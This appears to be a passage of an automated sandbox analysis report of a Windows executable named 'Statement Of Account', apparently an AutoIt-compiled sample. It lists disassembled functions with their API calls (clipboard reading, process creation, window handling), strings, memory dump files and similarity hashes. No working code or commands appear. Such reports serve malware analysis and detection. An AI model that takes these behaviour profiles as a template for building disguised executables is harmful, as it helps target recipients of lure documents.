GetTextFaceW.GDI32(00000000,00000040,?), ref: 00459165
DeleteDC.GDI32(00000000), ref: 00459177
CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004591BB
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 004591D3
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045920F
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459223
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459234
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 0045926C
GetStockObject.GDI32(00000011), ref: 00459277
SendMessageW.USER32(?,00000030,00000000), ref: 00459283
ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045928E

Strings

DISPLAY, xrefs: 00459139
msctls_progress32, xrefs: 00459205
AutoIt v3, xrefs: 004590DA
static, xrefs: 0045912A, 00459265

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustClientDeleteFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 4116885437-517079104
Opcode ID: 40c8642fada7bbcb7b1185fd2ffdadffed6c706243c274e02a1ca7fbe288ab28
Instruction ID: b46b79125a70aae959a7c4d6956a88ee10f6be47e9487b2d4240e2c4b3488d18
Opcode Fuzzy Hash: 40c8642fada7bbcb7b1185fd2ffdadffed6c706243c274e02a1ca7fbe288ab28
Instruction Fuzzy Hash: 86A1A471254300AFE314DF64DD4AF6B77A9EB84B01F104A2DBB45AB2D1DAB4E804CB6D

Function 0046C604 Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 216clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(?), ref: 0046C635
IsClipboardFormatAvailable.USER32(0000000D), ref: 0046C643
GetClipboardData.USER32(0000000D), ref: 0046C64F
CloseClipboard.USER32 ref: 0046C65D
GlobalLock.KERNEL32(00000000), ref: 0046C688
CloseClipboard.USER32 ref: 0046C692
IsClipboardFormatAvailable.USER32(00000001), ref: 0046C6D5
GetClipboardData.USER32(00000001), ref: 0046C6DD
GlobalLock.KERNEL32(00000000), ref: 0046C6EE
GlobalUnlock.KERNEL32(00000000), ref: 0046C726
CloseClipboard.USER32 ref: 0046C866

Strings

HH, xrefs: 0046C625

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Clipboard$CloseGlobal$AvailableDataFormatLock$OpenUnlock
String ID: HH
API String ID: 589737431-2761332787
Opcode ID: 1f8588b948bb152d659cc961560e711d284fc80ef968a1445fa6f6d22cce4332
Instruction ID: ccec0c76267f611a980a6192e38ed766f4c6ddce8b7f15b38bc446a2cb1d96e7
Opcode Fuzzy Hash: 1f8588b948bb152d659cc961560e711d284fc80ef968a1445fa6f6d22cce4332
Instruction Fuzzy Hash: 4D61E5722003019BD310EF65DD86B5E77A8EF54715F00483EFA41E72D1EBB5D9048BAA

Function 00454DAA Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 203windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00454DCF
_wcslen.LIBCMT ref: 00454DE2
__wcsicoll.LIBCMT ref: 00454DEF
_wcslen.LIBCMT ref: 00454E04
__wcsicoll.LIBCMT ref: 00454E11
_wcslen.LIBCMT ref: 00454E24
__wcsicoll.LIBCMT ref: 00454E31

Part of subcall function 004115D0: __wcsicmp_l.LIBCMT ref: 00411657

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00454E65
LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,?,?,?,?,?,?,?,00000000), ref: 00454E79
LoadImageW.USER32(00000000,00000000,?,00000001,?,?), ref: 00454EB7
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00454EFB
LoadImageW.USER32(00000000,00000000,?,00000001,?,?), ref: 00454F2C
FreeLibrary.KERNEL32(00000000), ref: 00454F37
ExtractIconExW.SHELL32(?,00000000,00000000,?,00000001), ref: 00454F94
DestroyCursor.USER32(?), ref: 00454FA2
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00454FC0
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00454FCC
MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00454FF1

Strings

.exe, xrefs: 00454DF9
.icl, xrefs: 00454DDC
.dll, xrefs: 00454E1B

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Load$Image_wcslen$__wcsicoll$LibraryMessageSend$CursorDestroyExtractFreeIconMoveWindow__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 921679252-1154884017
Opcode ID: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
Instruction ID: 777b7c61fe84a0ac0f88e3bb9536c5d4e291b97e4b5026f6b39318954af55ba4
Opcode Fuzzy Hash: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
Instruction Fuzzy Hash: D461D9711043016AE620DF659D85F7B73ECEF84B0AF00481EFE81D5182E7B9A989C77A

Function 00452788 Relevance: 34.8, APIs: 23, Instructions: 344COMMON

Download Yara Rule

APIs

Part of subcall function 004431E0: __time64.LIBCMT ref: 004431EA

_fseek.LIBCMT ref: 004527FC
__wsplitpath.LIBCMT ref: 0045285C
_wcscpy.LIBCMT ref: 00452871
_wcscat.LIBCMT ref: 00452886
__wsplitpath.LIBCMT ref: 004528B0
_wcscat.LIBCMT ref: 004528C8
_wcscat.LIBCMT ref: 004528DD
__fread_nolock.LIBCMT ref: 00452914
__fread_nolock.LIBCMT ref: 00452925
__fread_nolock.LIBCMT ref: 00452944
__fread_nolock.LIBCMT ref: 00452955
__fread_nolock.LIBCMT ref: 00452976
__fread_nolock.LIBCMT ref: 00452987
__fread_nolock.LIBCMT ref: 00452998
__fread_nolock.LIBCMT ref: 004529A9

Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9

__fread_nolock.LIBCMT ref: 00452A39

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
String ID:
API String ID: 2054058615-0
Opcode ID: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
Instruction ID: 66779ec6e5012556871fefb3c18d5d4f0449fb8b445ab61f685bb60241e2a5ae
Opcode Fuzzy Hash: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
Instruction Fuzzy Hash: 16C14EB2508340ABD320DF65C881EEBB7E8EFC9714F444D2FF68987241E6799544CBA6

Function 0045657D Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 287windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00456692
GetDesktopWindow.USER32 ref: 004566AA
GetWindowRect.USER32(00000000), ref: 004566B1
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456779
SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 00456797
SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567C0
SendMessageW.USER32(?,00000421,?,?), ref: 004567D8
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 004567EE
IsWindowVisible.USER32(?), ref: 00456812
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 0045682E
SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 00456843
GetWindowRect.USER32(?,?), ref: 0045685C
MonitorFromPoint.USER32(?,?,00000002), ref: 00456880
GetMonitorInfoW.USER32 ref: 00456894
CopyRect.USER32(?,?), ref: 004568A8
SendMessageW.USER32(?,00000412,00000000), ref: 0045690A

Strings

(, xrefs: 0045688C
,, xrefs: 00456642
tooltips_class32, xrefs: 00456772

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: MessageSend$Window$Rect$Monitor$CopyCreateCursorDesktopFromInfoPointVisible
String ID: ($,$tooltips_class32
API String ID: 250492556-3320066284
Opcode ID: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
Instruction ID: 3987ef5f26dee50c6234681dd74380f3ee0746d74ffcadc96223edc745891050
Opcode Fuzzy Hash: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
Instruction Fuzzy Hash: 33B18EB0604341AFD714DF64C984B6BB7E5EF88704F408D2DF989A7292D778E848CB5A

Function 004559A8 Relevance: 31.9, APIs: 17, Strings: 1, Instructions: 401COMMON

Download Yara Rule

Strings

0, xrefs: 00455C2D

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: b9da739ef4394ef292cf8eb25369925a80ec30f337521dada9f854f90e9bbf21
Instruction ID: a4e6889c8706d2a682ad3cc8acca51b009283e1ae9b51da70db0806919efebf9
Opcode Fuzzy Hash: b9da739ef4394ef292cf8eb25369925a80ec30f337521dada9f854f90e9bbf21
Instruction Fuzzy Hash: 95C104723403416BF3209B64DC46FBBB794EB95321F04453FFA45D62C1EBBA9409876A

Function 004700B0 Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 285windowtimeCOMMON

Download Yara Rule

APIs

Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734

GetWindowRect.USER32(?,?), ref: 004701EA
GetClientRect.USER32(?,?), ref: 004701FA
GetSystemMetrics.USER32(00000007), ref: 00470202
GetSystemMetrics.USER32(00000008), ref: 00470216
GetSystemMetrics.USER32(00000004), ref: 00470238
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0047026B
GetSystemMetrics.USER32(00000007), ref: 00470273
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004702A0
GetSystemMetrics.USER32(00000008), ref: 004702A8
GetSystemMetrics.USER32(00000004), ref: 004702CF
SetRect.USER32(?,00000000,00000000,?,?), ref: 004702F1
AdjustWindowRectEx.USER32(?,?,00000000,000000FF), ref: 00470304
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 0047033E
GetClientRect.USER32(?,?), ref: 00470371
GetStockObject.GDI32(00000011), ref: 00470391
SendMessageW.USER32(?,00000030,00000000), ref: 0047039D
SetTimer.USER32(00000000,00000000,00000028,Function_00061E7F), ref: 004703C4

Strings

AutoIt v3 GUI, xrefs: 00470338

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateMessageObjectSendStockTimer_malloc
String ID: AutoIt v3 GUI
API String ID: 3078149357-248962490
Opcode ID: 2f3c1093d205cc919e8fce6edce52452572e464071e7d7185a704cd66ddcb838
Instruction ID: 96ed3905d942d8c5c267f8207effb08aff50268186fc7250a269a1908d1679c9
Opcode Fuzzy Hash: 2f3c1093d205cc919e8fce6edce52452572e464071e7d7185a704cd66ddcb838
Instruction Fuzzy Hash: 27B19F71205301AFD324DF68DD45B6BB7E4FB88710F108A2EFA9587290DBB5E844CB5A

Function 00436B3A Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 190COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00436B79
_wcscpy.LIBCMT ref: 00436B9F
_wcscat.LIBCMT ref: 00436BC0
74D31560.VERSION(00000000,\VarFileInfo\Translation,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00436BE7
_wcscat.LIBCMT ref: 00436C2A
_wcscat.LIBCMT ref: 00436C31
__wcsicoll.LIBCMT ref: 00436C4B
_wcsncpy.LIBCMT ref: 00436C62

Strings

\VarFileInfo\Translation, xrefs: 00436BE1
04090000, xrefs: 00436C16
%u.%u.%u.%u, xrefs: 00436CCB
DefaultLangCodepage, xrefs: 00436C45
StringFileInfo\, xrefs: 00436BBA

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: _wcscat$D31560__wcsicoll_wcscpy_wcslen_wcsncpy
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 3890021153-1459072770
Opcode ID: 1bca29e3adc21336a21f3c01565ed382529ec8d4b1eae201a388b16e544b708b
Instruction ID: f4118b49cd66f9fee818cdfc0bae26735a4a754b0a3131160812af9443992caa
Opcode Fuzzy Hash: 1bca29e3adc21336a21f3c01565ed382529ec8d4b1eae201a388b16e544b708b
Instruction Fuzzy Hash: B54115B264020137D200B7269C83EFF735CDE99715F54091FFE45A2253FA2EA69642BE

Function 0046884B Relevance: 31.6, APIs: 6, Strings: 12, Instructions: 113COMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 0046887D
__wcsicoll.LIBCMT ref: 00468895
__wcsnicmp.LIBCMT ref: 004688B5

Strings

HANDLE=, xrefs: 004688AF
REGEXP=, xrefs: 004688D9
[LAST, xrefs: 00468972
[CLASS:, xrefs: 00468915
[ALL, xrefs: 0046896B
LAST, xrefs: 00468877
CLASSNAME=, xrefs: 00468903
ACTIVE, xrefs: 0046888F
ALL, xrefs: 00468959
[HANDLE:, xrefs: 004688C1
[REGEXPTITLE:, xrefs: 004688EB
[ACTIVE, xrefs: 004688A1

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: __wcsicoll$__wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 790654849-1810252412
Opcode ID: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
Instruction ID: 1b62209f2aa4de5792947d5a3aa61dcd1c874d3672784017b8f4b2c72f71c34c
Opcode Fuzzy Hash: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
Instruction Fuzzy Hash: 7A3193B1644301A7CA00FA61DC83F5B73A85F54759F100A3FB955B61D6FA6CEA0C862F

Function 00448759 Relevance: 30.1, APIs: 16, Strings: 1, Instructions: 311COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(004A83D8,00000000,00000000,00000000,00000000,00000000,00000013,004A83D8,?,?), ref: 0044880A

Strings

0, xrefs: 00448A3E

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Window
String ID: 0
API String ID: 2353593579-4108050209
Opcode ID: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
Instruction ID: 13976ff69904029c6bcd7d6129a783336058688c161485e0dcc644b2654616cc
Opcode Fuzzy Hash: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
Instruction Fuzzy Hash: 94B19DB02443419FF324CF14C889BABBBE4EB89744F14491EF991972D1DBB8E845CB5A

Function 00463F19 Relevance: 28.4, APIs: 14, Strings: 2, Instructions: 396processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00463F35
_wcslen.LIBCMT ref: 004640A0
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 004640B6
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 004640DC
_wcslen.LIBCMT ref: 0046419A
GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 004641B4
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 004641DA
_wcslen.LIBCMT ref: 0046422C
_wcslen.LIBCMT ref: 00464244
_wcslen.LIBCMT ref: 00464267
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 004642CA
GetLastError.KERNEL32(00000000,00000001,00000000,?,?), ref: 00464304
CloseHandle.KERNEL32(?,?,?), ref: 0046434C
CloseHandle.KERNEL32(?), ref: 004643DD

Strings

D, xrefs: 00463F46
HH, xrefs: 004640E3

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: _wcslen$Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID: D$HH
API String ID: 908184983-3550586394
Opcode ID: 9c94baab72e5f216c2de1bbe37285b47dbfb71c8dd0184069956c6c9248de8d4
Instruction ID: fb727168ff3a635639fa9d56eabcb50e9dc6a5bc9d0fc25d7c440df2c68cb0fa
Opcode Fuzzy Hash: 9c94baab72e5f216c2de1bbe37285b47dbfb71c8dd0184069956c6c9248de8d4
Instruction Fuzzy Hash: F1E1F1B15043419BD720EF75C845B5BB7E4AFC4308F104A2EF98987392EB39E945CB5A

Function 0046CAAA Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 229COMMON

Download Yara Rule

Strings

\, xrefs: 0046CB90
>>>AUTOIT SCRIPT<<<, xrefs: 0046CD72

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID:
String ID: >>>AUTOIT SCRIPT<<<$\
API String ID: 0-1896584978
Opcode ID: 044f2c4ecf877d2b2fc48157703a0e30c53185d3f7c6c17f150f9ffb4993ef22
Instruction ID: e6fbcda15cb9520e0e34bfac0f9750edaedb1b44b840e2dcfb1a2c219c195b9a
Opcode Fuzzy Hash: 044f2c4ecf877d2b2fc48157703a0e30c53185d3f7c6c17f150f9ffb4993ef22
